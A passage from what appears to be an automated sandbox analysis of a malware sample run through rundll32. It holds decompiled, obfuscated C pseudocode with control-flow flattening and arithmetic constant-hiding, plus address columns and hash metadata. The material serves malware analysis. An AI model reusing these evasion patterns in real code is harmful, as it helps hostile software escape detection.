										_t259 =  *0x36520c; // 0x0
										_t261 =  *0x36520c; // 0x0
										E0034E7CE(_t258, _t322, _v1128, _t261 + 8, _v1136, _v1104, _v1064, _v1088, _v1092, _t259 + 0x220);
										E0034AE03(_v1140, _v1120, _v1112, _t258);
										_t315 =  &(_t315[0xd]);
										_t266 = 0xd630330;
										continue;
									}
								}
							}
						}
						L13:
						return _t302;
					}
					_t266 = 0xdb8f695;
					L10:
					__eflags = _t266 - 0x3cedcca;
				} while (__eflags != 0);
				goto L13;
			}















































                                                                                                                      0x0034f93d
                                                                                                                      0x0034f943
                                                                                                                      0x0034f94d
                                                                                                                      0x0034f955
                                                                                                                      0x0034f95e
                                                                                                                      0x0034f960
                                                                                                                      0x0034f964
                                                                                                                      0x0034f968
                                                                                                                      0x0034f970
                                                                                                                      0x0034f978
                                                                                                                      0x0034f980
                                                                                                                      0x0034f98e
                                                                                                                      0x0034f993
                                                                                                                      0x0034f999
                                                                                                                      0x0034f9a1
                                                                                                                      0x0034f9ad
                                                                                                                      0x0034f9b2
                                                                                                                      0x0034f9bc
                                                                                                                      0x0034f9c1
                                                                                                                      0x0034f9cb
                                                                                                                      0x0034f9d0
                                                                                                                      0x0034f9d6
                                                                                                                      0x0034f9de
                                                                                                                      0x0034f9e6
                                                                                                                      0x0034f9ee
                                                                                                                      0x0034f9f6
                                                                                                                      0x0034f9fe
                                                                                                                      0x0034fa06
                                                                                                                      0x0034fa0e
                                                                                                                      0x0034fa16
                                                                                                                      0x0034fa1e
                                                                                                                      0x0034fa26
                                                                                                                      0x0034fa2e
                                                                                                                      0x0034fa36
                                                                                                                      0x0034fa3e
                                                                                                                      0x0034fa46
                                                                                                                      0x0034fa4e
                                                                                                                      0x0034fa56
                                                                                                                      0x0034fa5e
                                                                                                                      0x0034fa66
                                                                                                                      0x0034fa6e
                                                                                                                      0x0034fa76
                                                                                                                      0x0034fa7e
                                                                                                                      0x0034fa86
                                                                                                                      0x0034fa8f
                                                                                                                      0x0034fa92
                                                                                                                      0x0034fa9b
                                                                                                                      0x0034fa9f
                                                                                                                      0x0034faa7
                                                                                                                      0x0034faaf
                                                                                                                      0x0034fab7
                                                                                                                      0x0034fabf
                                                                                                                      0x0034fac7
                                                                                                                      0x0034facf
                                                                                                                      0x0034fad7
                                                                                                                      0x0034fadf
                                                                                                                      0x0034faf4
                                                                                                                      0x0034faf9
                                                                                                                      0x0034faff
                                                                                                                      0x0034fb08
                                                                                                                      0x0034fb10
                                                                                                                      0x0034fb18
                                                                                                                      0x0034fb25
                                                                                                                      0x0034fb28
                                                                                                                      0x0034fb2c
                                                                                                                      0x0034fb30
                                                                                                                      0x0034fb38
                                                                                                                      0x0034fb40
                                                                                                                      0x0034fb48
                                                                                                                      0x0034fb55
                                                                                                                      0x0034fb59
                                                                                                                      0x0034fb61
                                                                                                                      0x0034fb69
                                                                                                                      0x0034fb6e
                                                                                                                      0x0034fb76
                                                                                                                      0x0034fb7b
                                                                                                                      0x0034fb83
                                                                                                                      0x0034fb8b
                                                                                                                      0x0034fb93
                                                                                                                      0x0034fb9d
                                                                                                                      0x0034fba0
                                                                                                                      0x0034fba4
                                                                                                                      0x0034fbac
                                                                                                                      0x0034fbbc
                                                                                                                      0x0034fbc0
                                                                                                                      0x0034fbc9
                                                                                                                      0x0034fbce
                                                                                                                      0x0034fbd4
                                                                                                                      0x0034fbdc
                                                                                                                      0x0034fbe4
                                                                                                                      0x0034fbec
                                                                                                                      0x0034fbf4
                                                                                                                      0x0034fbfc
                                                                                                                      0x0034fc04
                                                                                                                      0x0034fc0c
                                                                                                                      0x0034fc14
                                                                                                                      0x0034fc20
                                                                                                                      0x0034fc23
                                                                                                                      0x0034fc27
                                                                                                                      0x0034fc2f
                                                                                                                      0x0034fc37
                                                                                                                      0x0034fc47
                                                                                                                      0x0034fc4f
                                                                                                                      0x0034fc54
                                                                                                                      0x0034fc5c
                                                                                                                      0x0034fc5c
                                                                                                                      0x0034fc6e
                                                                                                                      0x0034fd78
                                                                                                                      0x0034fc74
                                                                                                                      0x0034fc7a
                                                                                                                      0x0034fd2b
                                                                                                                      0x0034fd30
                                                                                                                      0x0034fd31
                                                                                                                      0x0034fd3d
                                                                                                                      0x0034fd44
                                                                                                                      0x0034fd48
                                                                                                                      0x0034fd4a
                                                                                                                      0x0034fd4d
                                                                                                                      0x00000000
                                                                                                                      0x0034fc80
                                                                                                                      0x0034fc82
                                                                                                                      0x0034fd15
                                                                                                                      0x0034fd1a
                                                                                                                      0x0034fd1d
                                                                                                                      0x00000000
                                                                                                                      0x0034fc84
                                                                                                                      0x0034fc84
                                                                                                                      0x0034fc86
                                                                                                                      0x00000000
                                                                                                                      0x0034fc8c
                                                                                                                      0x0034fc8c
                                                                                                                      0x0034fc90
                                                                                                                      0x0034fc9c
                                                                                                                      0x0034fca1
                                                                                                                      0x0034fcab
                                                                                                                      0x0034fcc8
                                                                                                                      0x0034fcdd
                                                                                                                      0x0034fcef
                                                                                                                      0x0034fcf4
                                                                                                                      0x0034fcf7
                                                                                                                      0x00000000
                                                                                                                      0x0034fcf7
                                                                                                                      0x0034fc86
                                                                                                                      0x0034fc82
                                                                                                                      0x0034fc7a
                                                                                                                      0x0034fd7f
                                                                                                                      0x0034fd8b
                                                                                                                      0x0034fd8b
                                                                                                                      0x0034fd57
                                                                                                                      0x0034fd59
                                                                                                                      0x0034fd59
                                                                                                                      0x0034fd59
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *7$Pd$6
                                                                                                                      • API String ID: 0-2172486832
                                                                                                                      • Opcode ID: 3d2506e9f47e1989dcb0918540491f154efc7d0c8a154774cf791730a520e7fb
                                                                                                                      • Instruction ID: 7edb48eeced8f33b3e892627cbcf2eea50117079b715019dd429fb0c6aa02316
                                                                                                                      • Opcode Fuzzy Hash: 3d2506e9f47e1989dcb0918540491f154efc7d0c8a154774cf791730a520e7fb
                                                                                                                      • Instruction Fuzzy Hash: 10B133B15083409FD354CF26C88994FFBE1FBC8758F408A2DF6968A260D7B59909CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00348D95 Relevance: 3.9, Strings: 3, Instructions: 194COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 75%
                                                                                                                      			E00348D95(void* __ecx, void* __edx, void* __eflags) {
				void* _t231;
				signed int _t261;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				void* _t269;
				intOrPtr* _t290;
				void* _t291;

				_t290 = _t291 - 0x6c;
				_push( *((intOrPtr*)(_t290 + 0x7c)));
				_push( *((intOrPtr*)(_t290 + 0x78)));
				_push( *((intOrPtr*)(_t290 + 0x74)));
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t231);
				 *(_t290 + 8) =  *(_t290 + 8) & 0x00000000;
				 *_t290 = 0x81872b;
				 *((intOrPtr*)(_t290 + 4)) = 0xdf4fac;
				 *(_t290 + 0x2c) = 0x807aaf;
				_t265 = 0x3e;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) * 0x66;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) >> 0xc;
				 *(_t290 + 0x2c) =  *(_t290 + 0x2c) ^ 0x0003330f;
				 *(_t290 + 0x50) = 0x6f2162;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) >> 4;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) * 0x62;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) + 0xffffa9e2;
				 *(_t290 + 0x50) =  *(_t290 + 0x50) ^ 0x02a8505a;
				 *(_t290 + 0x58) = 0xe574ec;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0x326d;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9da0d68a;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) + 0xbde6;
				 *(_t290 + 0x58) =  *(_t290 + 0x58) ^ 0x9d4627b9;
				 *(_t290 + 0x20) = 0xd3956a;
				 *(_t290 + 0x20) =  *(_t290 + 0x20) * 0x24;
				 *(_t290 + 0x20) =  *(_t290 + 0x20) ^ 0x1dc1e5a2;
				 *(_t290 + 0x14) = 0xfcd290;
				 *(_t290 + 0x14) =  *(_t290 + 0x14) >> 0x10;
				 *(_t290 + 0x14) =  *(_t290 + 0x14) ^ 0x00095bca;
				 *(_t290 + 0x64) = 0x85109;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x78e3fbb1;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) + 0xffffa60f;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) | 0x3bc8e61c;
				 *(_t290 + 0x64) =  *(_t290 + 0x64) ^ 0x7bee7ea1;
				 *(_t290 + 0x3c) = 0x71f5e0;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) >> 3;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) + 0xebfe;
				 *(_t290 + 0x3c) =  *(_t290 + 0x3c) ^ 0x0002c43f;
				 *(_t290 + 0x28) = 0x899f0e;
				 *(_t290 + 0x28) =  *(_t290 + 0x28) + 0x8a6f;
				 *(_t290 + 0x28) =  *(_t290 + 0x28) ^ 0x0089e2c7;
				 *(_t290 + 0x54) = 0x38c331;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t265;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x1d97b6ad;
				_t266 = 0x30;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) / _t266;
				 *(_t290 + 0x54) =  *(_t290 + 0x54) ^ 0x0098c8d2;
				 *(_t290 + 0x38) = 0xd05f1;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) >> 7;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) << 0xf;
				 *(_t290 + 0x38) =  *(_t290 + 0x38) ^ 0x0d051a45;
				 *(_t290 + 0x30) = 0x1cfed4;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) >> 0x10;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc4190834;
				 *(_t290 + 0x30) =  *(_t290 + 0x30) ^ 0xc41fa725;
				 *(_t290 + 0x40) = 0x1c7373;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) * 0x75;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) << 0xc;
				 *(_t290 + 0x40) =  *(_t290 + 0x40) ^ 0x0c3b1071;
				 *(_t290 + 0x18) = 0x2a4c72;
				 *(_t290 + 0x18) =  *(_t290 + 0x18) >> 0xe;
				 *(_t290 + 0x18) =  *(_t290 + 0x18) ^ 0x00012640;
				 *(_t290 + 0x4c) = 0xadab42;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) + 0xc082;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0x0f040eb7;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) | 0xc54ebe7a;
				 *(_t290 + 0x4c) =  *(_t290 + 0x4c) ^ 0xcfe19c3b;
				 *(_t290 + 0x5c) = 0x1c041c;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0x881f;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) + 0xa114;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) << 2;
				 *(_t290 + 0x5c) =  *(_t290 + 0x5c) ^ 0x007200ac;
				 *(_t290 + 0x44) = 0x9cf7da;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) | 0xc9a894cc;
				_t267 = 3;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) * 0xa;
				 *(_t290 + 0x44) =  *(_t290 + 0x44) ^ 0xe16343df;
				 *(_t290 + 0x60) = 0x461ba6;
				_t268 = 0xd;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) / _t267;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) + 0x5831;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab0fd2ba;
				 *(_t290 + 0x60) =  *(_t290 + 0x60) ^ 0xab16638d;
				 *(_t290 + 0x68) = 0x8d460c;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) * 0x3f;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) + 0x2d22;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) / _t268;
				 *(_t290 + 0x68) =  *(_t290 + 0x68) ^ 0x02a3ee27;
				 *(_t290 + 0x34) = 0x2e04ca;
				 *(_t290 + 0x34) =  *(_t290 + 0x34) | 0xfffff3f9;
				 *(_t290 + 0x34) =  *(_t290 + 0x34) ^ 0xfffa6071;
				 *(_t290 + 0x10) = 0xbf0768;
				 *(_t290 + 0x10) =  *(_t290 + 0x10) + 0xffff288c;
				 *(_t290 + 0x10) =  *(_t290 + 0x10) ^ 0x00be6359;
				 *(_t290 + 0xc) = 0xd072fa;
				 *(_t290 + 0xc) =  *(_t290 + 0xc) << 1;
				 *(_t290 + 0xc) =  *(_t290 + 0xc) ^ 0x01aa1a0e;
				 *(_t290 + 0x1c) = 0x9f8a7b;
				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb0eca93;
				 *(_t290 + 0x1c) =  *(_t290 + 0x1c) ^ 0xfb998053;
				 *(_t290 + 0x24) = 0xd784f2;
				 *(_t290 + 0x24) =  *(_t290 + 0x24) << 5;
				 *(_t290 + 0x24) =  *(_t290 + 0x24) ^ 0x1afc882d;
				 *(_t290 + 0x48) = 0xfdbd11;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0xbb0d2ead;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) >> 0xa;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) + 0xffffcd0b;
				 *(_t290 + 0x48) =  *(_t290 + 0x48) ^ 0x002ef0f8;
				_push( *(_t290 + 0x3c));
				_push( *(_t290 + 0x64));
				_push( *(_t290 + 0x14));
				_push( *(_t290 + 0x20));
				_t269 = 0x1e;
				E00361310(_t269, _t290 - 0x20);
				E00361310(0x208, _t290 - 0x228,  *(_t290 + 0x28),  *(_t290 + 0x54),  *(_t290 + 0x38),  *(_t290 + 0x30));
				E00361310(0x208, _t290 - 0x430,  *(_t290 + 0x40),  *(_t290 + 0x18),  *(_t290 + 0x4c),  *(_t290 + 0x5c));
				E003508A0( *((intOrPtr*)(_t290 + 0x7c)),  *(_t290 + 0x44),  *(_t290 + 0x60), _t290 - 0x228,  *(_t290 + 0x68));
				E003508A0( *((intOrPtr*)(_t290 + 0x78)),  *(_t290 + 0x34),  *(_t290 + 0x10), _t290 - 0x430,  *(_t290 + 0xc));
				 *(_t290 - 0x1c) =  *(_t290 + 0x2c);
				 *((intOrPtr*)(_t290 - 0x18)) = _t290 - 0x228;
				 *((intOrPtr*)(_t290 - 0x14)) = _t290 - 0x430;
				 *((short*)(_t290 - 0x10)) =  *(_t290 + 0x58) |  *(_t290 + 0x50) | 0x00000410;
				_t261 = E0035E2C5( *(_t290 + 0x1c),  *(_t290 + 0x24),  *(_t290 + 0x48), _t290 - 0x20);
				asm("sbb eax, eax");
				return  ~_t261 + 1;
			}












                                                                                                                      0x00348d96
                                                                                                                      0x00348da0
                                                                                                                      0x00348da3
                                                                                                                      0x00348da6
                                                                                                                      0x00348da9
                                                                                                                      0x00348daa
                                                                                                                      0x00348dab
                                                                                                                      0x00348db0
                                                                                                                      0x00348db6
                                                                                                                      0x00348dbd
                                                                                                                      0x00348dc4
                                                                                                                      0x00348dd1
                                                                                                                      0x00348dd4
                                                                                                                      0x00348dd7
                                                                                                                      0x00348ddb
                                                                                                                      0x00348de2
                                                                                                                      0x00348de9
                                                                                                                      0x00348df1
                                                                                                                      0x00348df4
                                                                                                                      0x00348dfb
                                                                                                                      0x00348e02
                                                                                                                      0x00348e09
                                                                                                                      0x00348e10
                                                                                                                      0x00348e17
                                                                                                                      0x00348e1e
                                                                                                                      0x00348e25
                                                                                                                      0x00348e30
                                                                                                                      0x00348e33
                                                                                                                      0x00348e3a
                                                                                                                      0x00348e41
                                                                                                                      0x00348e45
                                                                                                                      0x00348e4c
                                                                                                                      0x00348e53
                                                                                                                      0x00348e5a
                                                                                                                      0x00348e61
                                                                                                                      0x00348e68
                                                                                                                      0x00348e6f
                                                                                                                      0x00348e76
                                                                                                                      0x00348e7a
                                                                                                                      0x00348e81
                                                                                                                      0x00348e88
                                                                                                                      0x00348e8f
                                                                                                                      0x00348e96
                                                                                                                      0x00348e9d
                                                                                                                      0x00348eab
                                                                                                                      0x00348eae
                                                                                                                      0x00348eb8
                                                                                                                      0x00348ebb
                                                                                                                      0x00348ebe
                                                                                                                      0x00348ec5
                                                                                                                      0x00348ecc
                                                                                                                      0x00348ed0
                                                                                                                      0x00348ed4
                                                                                                                      0x00348edb
                                                                                                                      0x00348ee2
                                                                                                                      0x00348ee6
                                                                                                                      0x00348eed
                                                                                                                      0x00348ef4
                                                                                                                      0x00348eff
                                                                                                                      0x00348f02
                                                                                                                      0x00348f06
                                                                                                                      0x00348f0d
                                                                                                                      0x00348f14
                                                                                                                      0x00348f18
                                                                                                                      0x00348f1f
                                                                                                                      0x00348f26
                                                                                                                      0x00348f2d
                                                                                                                      0x00348f34
                                                                                                                      0x00348f3b
                                                                                                                      0x00348f42
                                                                                                                      0x00348f49
                                                                                                                      0x00348f52
                                                                                                                      0x00348f59
                                                                                                                      0x00348f5d
                                                                                                                      0x00348f64
                                                                                                                      0x00348f6b
                                                                                                                      0x00348f78
                                                                                                                      0x00348f7b
                                                                                                                      0x00348f7e
                                                                                                                      0x00348f85
                                                                                                                      0x00348f91
                                                                                                                      0x00348f92
                                                                                                                      0x00348f97
                                                                                                                      0x00348f9e
                                                                                                                      0x00348fa5
                                                                                                                      0x00348fac
                                                                                                                      0x00348fb7
                                                                                                                      0x00348fba
                                                                                                                      0x00348fc9
                                                                                                                      0x00348fcc
                                                                                                                      0x00348fd3
                                                                                                                      0x00348fda
                                                                                                                      0x00348fe1
                                                                                                                      0x00348fe8
                                                                                                                      0x00348fef
                                                                                                                      0x00348ff6
                                                                                                                      0x00348ffd
                                                                                                                      0x00349004
                                                                                                                      0x00349007
                                                                                                                      0x0034900e
                                                                                                                      0x00349015
                                                                                                                      0x0034901c
                                                                                                                      0x00349023
                                                                                                                      0x0034902a
                                                                                                                      0x0034902e
                                                                                                                      0x00349035
                                                                                                                      0x0034903c
                                                                                                                      0x00349043
                                                                                                                      0x00349047
                                                                                                                      0x0034904e
                                                                                                                      0x00349055
                                                                                                                      0x00349058
                                                                                                                      0x0034905b
                                                                                                                      0x0034905e
                                                                                                                      0x00349063
                                                                                                                      0x00349064
                                                                                                                      0x00349080
                                                                                                                      0x0034909c
                                                                                                                      0x003490b7
                                                                                                                      0x003490cf
                                                                                                                      0x003490d7
                                                                                                                      0x003490e0
                                                                                                                      0x003490e9
                                                                                                                      0x003490f7
                                                                                                                      0x00349108
                                                                                                                      0x00349112
                                                                                                                      0x00349119

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: b!o$rL*$t
                                                                                                                      • API String ID: 0-1909624753
                                                                                                                      • Opcode ID: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction ID: a949329b5cfb354484622402e33bec3083ede1cbd25f0cce20c321662792c30e
                                                                                                                      • Opcode Fuzzy Hash: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction Fuzzy Hash: 02B1DC7140038D9BDF59DF61C98A9CE3BA1FF44348F108219FE1A96260D7B5DA99CF84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034B41A Relevance: 3.9, Strings: 3, Instructions: 155COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0034B41A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				void* _t125;
				void* _t136;
				intOrPtr _t140;
				void* _t146;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t163;
				signed int* _t166;

				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(1);
				_push(__ecx);
				E0034CF25(_t125);
				_v56 = 0xe46139;
				_t166 =  &(( &_v60)[7]);
				_v56 = _v56 + 0x2728;
				_v56 = _v56 ^ 0xfa290e75;
				_t163 = 0;
				_v56 = _v56 >> 4;
				_t146 = 0x6cc7f8c;
				_v56 = _v56 ^ 0x0fa05392;
				_v60 = 0xdd8405;
				_v60 = _v60 + 0xffff7544;
				_t159 = 0x13;
				_v60 = _v60 / _t159;
				_t160 = 0x4a;
				_v60 = _v60 * 0x44;
				_v60 = _v60 ^ 0x03147b15;
				_v40 = 0xb1f638;
				_v40 = _v40 / _t160;
				_v40 = _v40 + 0xfdde;
				_v40 = _v40 ^ 0x000bffc0;
				_v20 = 0xc1e326;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x0f1113ff;
				_v24 = 0x9dff8e;
				_v24 = _v24 << 5;
				_v24 = _v24 ^ 0x13be58e4;
				_v44 = 0x26f48e;
				_v44 = _v44 >> 3;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x0002f448;
				_v48 = 0xa078f9;
				_t161 = 0x1c;
				_v48 = _v48 * 0xe;
				_v48 = _v48 ^ 0x04e4b6a4;
				_v48 = _v48 ^ 0x0c2dbe80;
				_v52 = 0xb739f4;
				_v52 = _v52 ^ 0x18b1fcfd;
				_v52 = _v52 ^ 0x2d0276e6;
				_v52 = _v52 ^ 0x3502a25a;
				_v28 = 0x1e50a5;
				_v28 = _v28 / _t161;
				_v28 = _v28 ^ 0x0008472d;
				_v32 = 0x99faaf;
				_v32 = _v32 + 0xfffffde3;
				_v32 = _v32 ^ 0x0091a9c4;
				_v36 = 0x23e8f3;
				_v36 = _v36 >> 1;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x064f5444;
				_v8 = 0xf9c016;
				_v8 = _v8 | 0x76d0de1d;
				_v8 = _v8 ^ 0x76f7039e;
				_v12 = 0x650156;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x000fa496;
				_v16 = 0x5361c2;
				_v16 = _v16 ^ 0x712c2ae6;
				_v16 = _v16 ^ 0x71790bc8;
				_t162 = _v4;
				do {
					while(_t146 != 0x2367fc3) {
						if(_t146 == 0x555e5ab) {
							E003613B1(_v4, _v44, _v48, _v52, 1, _a8, 1, _t146, _v28, _v32, _a4);
							_t166 =  &(_t166[9]);
							_t146 = 0xbed5482;
							_t163 =  !=  ? 1 : _t163;
							continue;
						} else {
							if(_t146 == 0x6cc7f8c) {
								_t146 = 0x9230dbb;
								continue;
							} else {
								if(_t146 == 0x9230dbb) {
									_t140 = E00349685(_t146);
									_t162 = _t140;
									if(_t140 != 0xffffffff) {
										_t146 = 0x2367fc3;
										continue;
									}
								} else {
									if(_t146 != 0xbed5482) {
										goto L15;
									} else {
										E00354DAD(_v36, _v8, _v4, _v12, _v16);
									}
								}
							}
						}
						L7:
						return _t163;
					}
					_t136 = E0035FB2B(_v40,  &_v4, _v20, _v24, _t162);
					_t166 =  &(_t166[3]);
					if(_t136 == 0) {
						_t146 = 0x362db31;
						goto L15;
					} else {
						_t146 = 0x555e5ab;
						continue;
					}
					goto L7;
					L15:
				} while (_t146 != 0x362db31);
				goto L7;
			}



























                                                                                                                      0x0034b424
                                                                                                                      0x0034b425
                                                                                                                      0x0034b429
                                                                                                                      0x0034b42d
                                                                                                                      0x0034b431
                                                                                                                      0x0034b435
                                                                                                                      0x0034b436
                                                                                                                      0x0034b437
                                                                                                                      0x0034b43c
                                                                                                                      0x0034b444
                                                                                                                      0x0034b447
                                                                                                                      0x0034b451
                                                                                                                      0x0034b459
                                                                                                                      0x0034b45b
                                                                                                                      0x0034b460
                                                                                                                      0x0034b465
                                                                                                                      0x0034b46d
                                                                                                                      0x0034b475
                                                                                                                      0x0034b483
                                                                                                                      0x0034b488
                                                                                                                      0x0034b493
                                                                                                                      0x0034b496
                                                                                                                      0x0034b49a
                                                                                                                      0x0034b4a2
                                                                                                                      0x0034b4b2
                                                                                                                      0x0034b4b6
                                                                                                                      0x0034b4be
                                                                                                                      0x0034b4c6
                                                                                                                      0x0034b4ce
                                                                                                                      0x0034b4d3
                                                                                                                      0x0034b4db
                                                                                                                      0x0034b4e3
                                                                                                                      0x0034b4e8
                                                                                                                      0x0034b4f0
                                                                                                                      0x0034b4f8
                                                                                                                      0x0034b4fd
                                                                                                                      0x0034b502
                                                                                                                      0x0034b50a
                                                                                                                      0x0034b517
                                                                                                                      0x0034b518
                                                                                                                      0x0034b51c
                                                                                                                      0x0034b524
                                                                                                                      0x0034b52c
                                                                                                                      0x0034b534
                                                                                                                      0x0034b53c
                                                                                                                      0x0034b544
                                                                                                                      0x0034b54c
                                                                                                                      0x0034b55a
                                                                                                                      0x0034b55e
                                                                                                                      0x0034b566
                                                                                                                      0x0034b56e
                                                                                                                      0x0034b576
                                                                                                                      0x0034b57e
                                                                                                                      0x0034b586
                                                                                                                      0x0034b58f
                                                                                                                      0x0034b593
                                                                                                                      0x0034b59b
                                                                                                                      0x0034b5a3
                                                                                                                      0x0034b5ab
                                                                                                                      0x0034b5b3
                                                                                                                      0x0034b5bb
                                                                                                                      0x0034b5c5
                                                                                                                      0x0034b5cd
                                                                                                                      0x0034b5d5
                                                                                                                      0x0034b5dd
                                                                                                                      0x0034b5e5
                                                                                                                      0x0034b5e9
                                                                                                                      0x0034b5e9
                                                                                                                      0x0034b5f7
                                                                                                                      0x0034b67d
                                                                                                                      0x0034b682
                                                                                                                      0x0034b685
                                                                                                                      0x0034b68c
                                                                                                                      0x00000000
                                                                                                                      0x0034b5f9
                                                                                                                      0x0034b5ff
                                                                                                                      0x0034b653
                                                                                                                      0x00000000
                                                                                                                      0x0034b601
                                                                                                                      0x0034b607
                                                                                                                      0x0034b643
                                                                                                                      0x0034b648
                                                                                                                      0x0034b64d
                                                                                                                      0x0034b64f
                                                                                                                      0x00000000
                                                                                                                      0x0034b64f
                                                                                                                      0x0034b609
                                                                                                                      0x0034b60f
                                                                                                                      0x00000000
                                                                                                                      0x0034b615
                                                                                                                      0x0034b629
                                                                                                                      0x0034b62e
                                                                                                                      0x0034b60f
                                                                                                                      0x0034b607
                                                                                                                      0x0034b5ff
                                                                                                                      0x0034b632
                                                                                                                      0x0034b63a
                                                                                                                      0x0034b63a
                                                                                                                      0x0034b6a5
                                                                                                                      0x0034b6aa
                                                                                                                      0x0034b6af
                                                                                                                      0x0034b6bb
                                                                                                                      0x00000000
                                                                                                                      0x0034b6b1
                                                                                                                      0x0034b6b1
                                                                                                                      0x00000000
                                                                                                                      0x0034b6b1
                                                                                                                      0x00000000
                                                                                                                      0x0034b6c0
                                                                                                                      0x0034b6c0
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ('$9a$*,q
                                                                                                                      • API String ID: 0-3312093510
                                                                                                                      • Opcode ID: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction ID: e69e39f5afdea35d071b5043708240d258c42fe146f486c0a6885898f834080e
                                                                                                                      • Opcode Fuzzy Hash: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction Fuzzy Hash: F06140711083409FC789CF21988A82BFAF6FBC4358F54491DF5929A260C3B1DA49CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

